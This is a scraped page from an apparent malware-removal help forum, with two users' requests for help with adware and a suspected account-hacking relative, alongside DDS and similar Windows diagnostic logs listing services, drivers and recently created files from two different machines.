S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2015-7-10 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2015-7-10 27488]
S3 USBAAPL64;Apple Mobile USB Driver;C:\WINDOWS\System32\drivers\usbaapl64.sys [2014-8-15 54784]
S3 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2015-7-10 31744]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 vmicvmsession;Hyper-V VM Session Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2015-7-10 39856]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2015-8-11 685568]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2015-7-10 119648]
S3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2015-7-10 362928]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2015-7-10 39856]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2015-7-10 26976]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2015-7-10 59232]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 WpnService;Windows Push Notifications Service;C:\WINDOWS\System32\svchost.exe -k wswpnservice [2015-7-10 39856]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2015-7-10 222720]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2015-7-10 25600]
S4 ArcService;Arc Service;C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe [2013-8-28 88424]
S4 DAUpdaterSvc;Dragon Age: Origins - Content Updater;C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe [2014-5-9 25832]
S4 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2014-12-11 315496]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2015-09-10 22:28:17 16148 ----a-w- C:\WINDOWS\System32\CHRIS-PC_Chris_HistoryPrediction.bin
2015-09-10 03:22:51 -------- d-----w- C:\Program Files\Common Files\AV
2015-09-10 03:18:57 -------- d-----w- C:\Users\Chris\AppData\Roaming\LavasoftStatistics
2015-09-10 03:17:55 -------- d-----w- C:\Users\Chris\AppData\Local\Lavasoft
2015-09-10 03:17:21 425744 ----a-w- C:\WINDOWS\System32\LavasoftTcpService64.dll
2015-09-10 03:17:20 345360 ----a-w- C:\WINDOWS\SysWow64\LavasoftTcpService.dll
2015-09-10 03:17:19 -------- d-----w- C:\Program Files (x86)\Lavasoft
2015-09-10 03:16:26 -------- d-----w- C:\Program Files\Lavasoft
2015-09-10 03:16:02 -------- d-----w- C:\Program Files\Common Files\Lavasoft
2015-09-10 03:15:07 21040 ----a-w- C:\WINDOWS\System32\sdnclean64.exe
2015-09-10 03:15:05 -------- d-----w- C:\ProgramData\Spybot - Search & Destroy
2015-09-10 03:14:54 -------- d-----w- C:\Program Files (x86)\Spybot - Search & Destroy 2
2015-09-10 02:59:29 -------- d-----w- C:\WINDOWS\pss
2015-09-10 00:26:35 11745192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{928049B6-2A91-49B8-B0FF-1EB54F85BA5B}\mpengine.dll
2015-09-09 00:08:32 11745192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2015-09-08 12:07:44 16148 ----a-w- C:\WINDOWS\System32\CHRIS-PC_Jeff_HistoryPrediction.bin
2015-09-03 23:10:12 1190000 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5CA7D4E6-52FD-4CAF-B22B-57451442A284}\gapaengine.dll
2015-09-02 01:08:20 574072 ----a-w- C:\WINDOWS\SysWow64\nvStreaming.exe
2015-09-02 00:57:39 69416 ----a-w- C:\WINDOWS\SysWow64\nvaudcap32v.dll
2015-08-28 11:30:59 609592 ----a-w- C:\WINDOWS\System32\ci.dll
2015-08-21 23:48:08 -------- d-----w- C:\Users\Chris\AppData\Roaming\OpenOffice
2015-08-20 01:46:05 16706560 ----a-w- C:\WINDOWS\System32\Windows.UI.Xaml.dll
2015-08-20 01:46:02 13024768 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Xaml.dll
.
==================== Find3M ====================
.
2015-08-30 22:47:38 11188880 ----a-w- C:\WINDOWS\System32\drivers\nvlddmkm.sys
2015-08-27 00:37:01 1423120 ----a-w- C:\WINDOWS\SysWow64\nvspcap.dll
2015-08-27 00:37:01 1316000 ----a-w- C:\WINDOWS\SysWow64\nvspbridge.dll
2015-08-27 00:36:47 1756424 ----a-w- C:\WINDOWS\System32\nvspbridge64.dll
2015-08-27 00:36:47 1710568 ----a-w- C:\WINDOWS\System32\nvspcap64.dll
2015-08-25 15:57:35 937592 ----a-w- C:\WINDOWS\System32\nvvsvc.exe
2015-08-25 15:57:34 6884984 ----a-w- C:\WINDOWS\System32\nvcpl.dll
2015-08-25 15:57:34 62584 ----a-w- C:\WINDOWS\System32\nvshext.dll
2015-08-25 15:57:34 385144 ----a-w- C:\WINDOWS\System32\nvmctray.dll
2015-08-25 15:57:34 3496752 ----a-w- C:\WINDOWS\System32\nvsvc64.dll
2015-08-25 15:57:34 2558584 ----a-w- C:\WINDOWS\System32\nvsvcr.dll
2015-08-25 13:02:18 5165808 ----a-w- C:\WINDOWS\System32\nvcoproc.bin
2015-08-20 06:07:55 8019296 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2015-08-20 05:57:13 77400 ----a-w- C:\WINDOWS\System32\acmigration.dll
2015-08-20 05:26:23 168960 ----a-w- C:\WINDOWS\System32\InstallAgent.exe
2015-08-20 05:21:28 21875200 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2015-08-20 05:21:13 193024 ----a-w- C:\WINDOWS\System32\EnterpriseModernAppMgmtCSP.dll
2015-08-20 04:31:28 18806272 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2015-08-18 07:56:25 2498808 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2015-08-18 07:55:45 373072 ----a-w- C:\WINDOWS\System32\drivers\USBXHCI.SYS
2015-08-18 07:54:30 1396064 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2015-08-18 07:27:23 1771592 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2015-08-18 07:24:35 963920 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2015-08-18 07:13:10 497664 ----a-w- C:\WINDOWS\System32\WlanMediaManager.dll
2015-08-18 07:13:06 387584 ----a-w- C:\WINDOWS\System32\NetSetupShim.dll
2015-08-18 07:12:20 692224 ----a-w- C:\WINDOWS\System32\drivers\UMDF\NfcCx.dll
2015-08-18 07:12:18 2225664 ----a-w- C:\WINDOWS\System32\NetworkMobileSettings.dll
2015-08-18 07:07:34 2226688 ----a-w- C:\WINDOWS\System32\wlansvc.dll
2015-08-18 07:04:20 859136 ----a-w- C:\WINDOWS\System32\modernexecserver.dll
2015-08-18 07:04:14 1234944 ----a-w- C:\WINDOWS\System32\aitstatic.exe
2015-08-18 06:59:35 1294336 ----a-w- C:\WINDOWS\System32\wcnwiz.dll
2015-08-18 06:59:02 140288 ----a-w- C:\WINDOWS\System32\WcnApi.dll
2015-08-18 06:58:46 50176 ----a-w- C:\WINDOWS\System32\WcnNetsh.dll
2015-08-18 06:58:34 112640 ----a-w- C:\WINDOWS\System32\fdWCN.dll
2015-08-18 06:58:31 117760 ----a-w- C:\WINDOWS\System32\dafWCN.dll
2015-08-18 06:58:25 187392 ----a-w- C:\WINDOWS\System32\NetSetupSvc.dll
2015-08-18 06:57:54 45568 ----a-w- C:\WINDOWS\System32\wfdprov.dll
2015-08-18 06:56:48 79872 ----a-w- C:\WINDOWS\System32\BthRadioMedia.dll
2015-08-18 06:55:01 2178560 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2015-08-18 06:54:11 247296 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2015-08-18 06:54:03 322048 ----a-w- C:\WINDOWS\System32\vaultsvc.dll
2015-08-18 06:52:26 1888768 ----a-w- C:\WINDOWS\System32\dwmcore.dll
2015-08-18 06:50:04 1795072 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.dll
2015-08-18 06:49:52 1061888 ----a-w- C:\WINDOWS\System32\reseteng.dll
2015-08-18 06:49:20 246272 ----a-w- C:\WINDOWS\System32\PackageStateRoaming.dll
2015-08-18 06:49:03 274432 ----a-w- C:\WINDOWS\SysWow64\NetSetupShim.dll
2015-08-18 06:36:08 1226752 ----a-w- C:\WINDOWS\SysWow64\wcnwiz.dll
2015-08-18 06:35:49 100352 ----a-w- C:\WINDOWS\SysWow64\WcnApi.dll
2015-08-18 06:35:18 95744 ----a-w- C:\WINDOWS\SysWow64\fdWCN.dll
2015-08-18 06:34:44 37376 ----a-w- C:\WINDOWS\SysWow64\wfdprov.dll
2015-08-18 06:29:11 1593344 ----a-w- C:\WINDOWS\SysWow64\dwmcore.dll
2015-08-18 06:26:08 195584 ----a-w- C:\WINDOWS\SysWow64\PackageStateRoaming.dll
2015-08-13 04:22:26 2093056 ----a-w- C:\WINDOWS\System32\wlidsvc.dll
2015-08-13 04:20:39 414208 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2015-08-13 03:53:21 311808 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2015-08-11 10:04:24 2462648 ----a-w- C:\WINDOWS\System32\mfcore.dll
2015-08-11 10:04:23 4532304 ----a-w- C:\WINDOWS\explorer.exe
2015-08-11 10:04:15 1087296 ----a-w- C:\WINDOWS\System32\mfplat.dll
2015-08-11 10:03:09 442208 ----a-w- C:\WINDOWS\System32\drivers\storport.sys
2015-08-11 10:02:57 554744 ----a-w- C:\WINDOWS\System32\directmanipulation.dll
2015-08-11 10:02:56 80720 ----a-w- C:\WINDOWS\System32\drivers\stornvme.sys
2015-08-11 10:02:49 292856 ----a-w- C:\WINDOWS\System32\LockAppHost.exe
2015-08-11 09:52:49 993104 ----a-w- C:\WINDOWS\System32\ReAgent.dll
2015-08-11 09:50:47 1643872 ----a-w- C:\WINDOWS\System32\diagtrack.dll
2015-08-11 09:40:22 4048808 ----a-w- C:\WINDOWS\SysWow64\explorer.exe
2015-08-11 09:40:12 918320 ----a-w- C:\WINDOWS\SysWow64\mfplat.dll
2015-08-11 09:40:08 2151208 ----a-w- C:\WINDOWS\SysWow64\mfcore.dll
2015-08-11 09:38:22 454000 ----a-w- C:\WINDOWS\SysWow64\directmanipulation.dll
2015-08-11 09:37:48 243800 ----a-w- C:\WINDOWS\SysWow64\LockAppHost.exe
2015-08-11 09:26:03 845664 ----a-w- C:\WINDOWS\SysWow64\ReAgent.dll
2015-08-11 09:21:13 148992 ----a-w- C:\WINDOWS\System32\tetheringservice.dll
2015-08-11 09:21:04 52224 ----a-w- C:\WINDOWS\System32\tetheringclient.dll
2015-08-11 09:20:02 483328 ----a-w- C:\WINDOWS\System32\OneDriveSettingSyncProvider.dll
2015-08-11 09:19:45 235520 ----a-w- C:\WINDOWS\System32\SettingsHandlers_Notifications.dll
2015-08-11 09:18:44 235008 ----a-w- C:\WINDOWS\System32\UserMgrProxy.dll
2015-08-11 09:16:32 2416640 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2015-08-11 09:14:02 404480 ----a-w- C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-11 09:13:42 413184 ----a-w- C:\WINDOWS\System32\diagtrack_win.dll
2015-08-11 09:11:40 2446336 ----a-w- C:\WINDOWS\System32\InputService.dll
2015-08-11 09:11:18 553472 ----a-w- C:\WINDOWS\System32\GamePanel.exe
2015-08-11 09:10:47 293376 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
2015-08-11 09:10:12 324096 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-08-11 09:10:06 778752 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.Store.dll
2015-08-11 09:09:55 32768 ----a-w- C:\WINDOWS\System32\wuautoappupdate.dll
2015-08-11 09:08:04 893440 ----a-w- C:\WINDOWS\System32\MbaeApiPublic.dll
2015-08-11 09:08:04 563200 ----a-w- C:\WINDOWS\System32\MbaeApi.dll
2015-08-11 09:07:52 593920 ----a-w- C:\WINDOWS\System32\wcmsvc.dll
2015-08-11 09:07:47 1178112 ----a-w- C:\WINDOWS\System32\wwansvc.dll
2015-08-11 09:07:44 115712 ----a-w- C:\WINDOWS\System32\MbaeParserTask.exe
2015-08-11 09:06:50 2662400 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2015-08-11 09:06:19 7523328 ----a-w- C:\WINDOWS\System32\Chakra.dll
2015-08-11 09:05:48 342016 ----a-w- C:\WINDOWS\System32\LocationGeofences.dll
2015-08-11 09:05:27 269312 ----a-w- C:\WINDOWS\System32\LocationFramework.dll
2015-08-11 09:05:23 78848 ----a-w- C:\WINDOWS\System32\LocationFrameworkInternalPS.dll
2015-08-11 09:05:20 137216 ----a-w- C:\WINDOWS\System32\LocationPermissions.dll
2015-08-11 09:05:10 996352 ----a-w- C:\WINDOWS\System32\RDXService.dll
2015-08-11 09:05:07 3527168 ----a-w- C:\WINDOWS\System32\tquery.dll
2015-08-11 09:03:09 2558976 ----a-w- C:\WINDOWS\System32\mssrch.dll
2015-08-11 09:02:53 186368 ----a-w- C:\WINDOWS\System32\cloudAP.dll
2015-08-11 09:02:15 621056 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
.
============= FINISH: 18:38:33.30 ===============

Attached Files

attach.txt (16.7 KB)

So I guess i downloaded a thing that installed a bunch of unwanted programs (i don't even remember what it was i was researching stuff and out of nowhere so many pop ups) and everytime i would uninstall one of them like two more would install by themselves. Everytime i go on my browser a bunch of ad pages show up and it slows down my laptop. I tried adwcleaner and it deleted a lot of malware files from the programs that were installed but when i checked control panel more programs were installed. I really don't know what to do??? Adwcleaner didn't delete some of the files it found, i could copy and paste the log on here if anyone wants to take a look??? I don't know.

Hiya, I need some urgent help, my bro in law has hacked my system. Tried all spyware, malware programs to detect any keyloggers, remote assist bugs etc but nothing comes up. I know there's something as he still figures out my fb passwords, freezes up my computer as he wishes, changing certain options, deleting files etc.
Need some help as I'm abit witty with pcs but it's been awhile so not really up to scratch with the latest stuff lol

I ran gaming pages and youtube channels so I tend to share content into groups etc, he makes life hard for me by getting me kicked/ banned from groups regularly... I assume he logs in as me on any of my accounts and posts porn into the groups am in so I can get banned/ kicked out... not to mention getting my fb accounts in trouble as well... and he does all this because he thinks he can get away with it because there's no poof or I can't show proof. Him and his minions troll me day and night, and he knows where to find my posts as he's hacked my system.

Update: Tried several anti virus programs including eset, spybot etc but nothing comes up... any help would be appreciated. Thanks

DDS

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 9.0.8112.16696 BrowserJavaVersion: 11.31.2
Run by User at 17:31:35 on 2015-09-11
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.44.1033.18.3061.1170 [GMT 1:00]
.
AV: ESET NOD32 Antivirus 8.0 *Enabled/Updated* {19259FAE-8396-A113-46DB-15B0E7DFA289}
AV: AVG AntiVirus Free Edition 2015 *Disabled/Outdated* {4D41356F-32AD-7C42-C820-63775EE4F413}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition 2015 *Disabled/Outdated* {F620D48B-1497-73CC-F290-58052563BEAE}
SP: ESET NOD32 Antivirus 8.0 *Enabled/Updated* {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}
FW: AVG Internet Security 2015 *Disabled* {757AB44A-78C2-7D1A-E37F-CA42A037B368}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\System32\WLTRYSVC.EXE
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\bcmwltry.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\AVG\AVG2015\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\BlueStacks\HD-LogRotatorService.exe
C:\Program Files\BlueStacks\HD-UpdaterService.exe
C:\Program Files\Nero\Update\NASvc.exe
C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Zemana AntiMalware\ZAM.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\WLTRAY.EXE
C:\Program Files\AVG\AVG2015\avgui.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\ctfmon.exe
C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
C:\Windows\System32\mobsync.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Windows\system32\Taskmgr.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
.
============== Pseudo HJT Report ===============
.
uStart Page = Google
uSearch Bar = Google
uDefault_Page_URL = about:blank
mStart Page = about:blank
mSearch Page = about:blank
mDefault_Page_URL = about:blank
mDefault_Search_URL = about:blank
BHO: RealNetworks Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - c:\programdata\realnetworks\realdownloader\browserplugins\ie\rndlbrowserrecordplugin.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office14\GROOVEEX.DLL
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre1.8.0_31\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre1.8.0_31\bin\jp2ssv.dll
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [Xvid] c:\program files\xvid\CheckUpdate.exe
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
mRun: [Broadcom Wireless Manager UI] c:\windows\system32\WLTRAY.exe
mRun: [SwitchBoard] c:\program files\common files\adobe\switchboard\SwitchBoard.exe
mRun: [AdobeCS5.5ServiceManager] "c:\program files\common files\adobe\cs5.5servicemanager\CS5.5ServiceManager.exe" -launchedbylogin
mRun: [AVG_UI] "c:\program files\avg\avg2015\avgui.exe" /TRAYONLY
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [ZAM] "c:\program files\zemana antimalware\ZAM.exe" /minimized
mRun: [PC Cleaners] "c:\programdata\pc cleaners\PCCleaners.exe" /minimize
mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
mRun: [egui] "c:\program files\eset\eset nod32 antivirus\egui.exe" /hide /waitservice
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\micros~2\office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office\office14\ONBttnIELinkedNotes.dll
DPF: {CAFEEFAC-0018-0000-0025-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_25-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_25-windows-i586.cab
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{278A7B0F-A822-43DD-A7E2-42510197FD1C} : DHCPNameServer = 149.254.230.7 149.254.192.126
TCP: Interfaces\{361C2C64-E765-485B-A392-96829E3B17EA} : DHCPNameServer = 192.168.0.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
Notify: igfxcui - igfxdev.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office14\GROOVEEX.DLL
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\45.0.2454.85\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHX;AVGIDSHX;c:\windows\system32\drivers\avgidshx.sys [2015-5-12 190944]
R0 Avglogx;AVG Logging Driver;c:\windows\system32\drivers\avglogx.sys [2015-5-7 290272]
R0 Avgmfx86;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\drivers\avgmfx86.sys [2015-7-28 186800]
R0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\drivers\avgrkx86.sys [2015-3-20 35808]
R1 Avgdiskx;AVG Disk Driver;c:\windows\system32\drivers\avgdiskx.sys [2015-3-11 132576]
R1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\drivers\avgidsdriverx.sys [2015-7-28 250288]
R1 AVGIDSShim;AVGIDSShim;c:\windows\system32\drivers\avgidsshimx.sys [2015-7-23 31664]
R1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\drivers\avgldx86.sys [2015-6-16 207328]
R1 Avgtdix;AVG TDI Driver;c:\windows\system32\drivers\avgtdix.sys [2015-5-12 213984]
R2 BstHdDrv;BlueStacks Hypervisor;c:\program files\bluestacks\HD-Hypervisor-x86.sys [2015-6-16 131704]
.
=============== Created Last 30 ================
.
2015-09-11 11:50:16 -------- d-----w- c:\users\bodo\appdata\local\ESET
2015-09-09 19:38:22 102912 ----a-w- c:\windows\system32\drivers\srvnet.sys
2015-09-09 19:38:21 304640 ----a-w- c:\windows\system32\drivers\srv.sys
2015-09-09 19:32:08 1402368 ----a-w- c:\windows\system32\msxml6.dll
2015-09-09 19:32:08 1253376 ----a-w- c:\windows\system32\msxml3.dll
2015-09-09 19:07:20 2048 ----a-w- c:\windows\system32\tzres.dll
2015-09-09 19:04:53 940032 ----a-w- c:\program files\common files\microsoft shared\ink\journal.dll
2015-09-09 19:04:52 1850880 ----a-w- c:\program files\windows journal\Journal.exe
2015-09-09 19:04:51 1220608 ----a-w- c:\program files\windows journal\NBDoc.DLL
2015-09-09 19:04:50 985600 ----a-w- c:\program files\windows journal\JNTFiltr.dll
2015-09-09 19:04:50 967680 ----a-w- c:\program files\windows journal\JNWDRV.dll
2015-09-09 19:02:59 34304 ----a-w- c:\windows\system32\atmlib.dll
2015-09-09 19:02:59 297472 ----a-w- c:\windows\system32\atmfd.dll
2015-09-09 19:02:55 2067456 ----a-w- c:\windows\system32\win32k.sys
2015-09-09 19:00:50 602112 ----a-w- c:\windows\system32\schedsvc.dll
2015-08-31 22:50:40 -------- d-----w- c:\users\User\appdata\roaming\RealNetworks
2015-08-31 22:49:28 -------- d-----w- c:\program files\RealNetworks
2015-08-31 22:49:22 -------- d-----w- c:\programdata\RealNetworks
2015-08-31 10:18:30 -------- d-----w- c:\programdata\PC Cleaners
2015-08-31 10:18:23 -------- d-----w- c:\programdata\PC1Data
2015-08-30 01:00:30 -------- d-----w- c:\programdata\KingSoft
2015-08-30 00:57:55 -------- d-----w- c:\programdata\TXQMPC
2015-08-30 00:57:55 -------- d-----w- c:\program files\Rising
2015-08-30 00:57:53 -------- d-----w- c:\programdata\Rising
2015-08-30 00:54:35 -------- d-----w- c:\program files\common files\Tencent
2015-08-30 00:51:20 -------- d-----w- c:\users\User\appdata\roaming\Tencent
2015-08-30 00:51:15 -------- d-----w- c:\programdata\Tencent
2015-08-30 00:19:02 -------- d-----w- C:\ppsfile
2015-08-30 00:19:01 -------- d-----w- C:\qycache
2015-08-30 00:11:40 -------- d-----w- C:\IQIYI Video
2015-08-30 00:02:23 -------- d-----w- c:\users\User\appdata\local\globalUpdate
2015-08-30 00:02:23 -------- d-----w- c:\program files\globalUpdate
2015-08-30 00:00:23 -------- d-----w- c:\users\User\appdata\roaming\DailyPCClean
2015-08-29 23:39:35 -------- d-----w- c:\users\User\appdata\local\4C4C4544-1440895174-3710-8046-C4C04F4E334A
2015-08-29 23:38:12 -------- d-----w- c:\programdata\28341ff220e0446c9fff27c4493d622e
2015-08-29 23:35:41 -------- d-----w- c:\users\User\appdata\roaming\WeatherTool
2015-08-29 15:20:06 -------- d-----w- c:\program files\Controller
2015-08-29 15:00:36 -------- d-----w- c:\programdata\regid.1986-12.com.adobe
2015-08-29 12:00:15 -------- d-----w- c:\users\User\appdata\local\{925B1088-DD5F-47C0-8964-53D8D1C5CF0E}
2015-08-29 11:29:38 -------- d-----w- c:\users\User\appdata\local\{8F1267F6-E90F-490A-82CA-509F1DFD0E9C}
2015-08-27 11:25:17 -------- d-----w- c:\programdata\Sony Corporation
2015-08-26 09:08:52 -------- d-----w- c:\program files\SystemRequirementsLab
2015-08-25 12:52:55 -------- d-----w- c:\users\User\appdata\local\{B318BA93-77DE-4D50-BAEA-A18131CFA774}
2015-08-24 10:45:29 -------- d-----w- c:\program files\World of Warcraft
2015-08-24 10:42:01 -------- d-----w- c:\users\User\appdata\local\Blizzard Entertainment
2015-08-24 10:41:41 -------- d-----w- c:\users\User\appdata\roaming\Battle.net
2015-08-24 10:41:41 -------- d-----w- c:\users\User\appdata\local\Battle.net
2015-08-24 10:40:34 -------- d-----w- c:\programdata\Blizzard Entertainment
2015-08-24 10:40:34 -------- d-----w- c:\program files\Battle.net
2015-08-24 10:38:13 -------- d-----w- c:\programdata\Battle.net
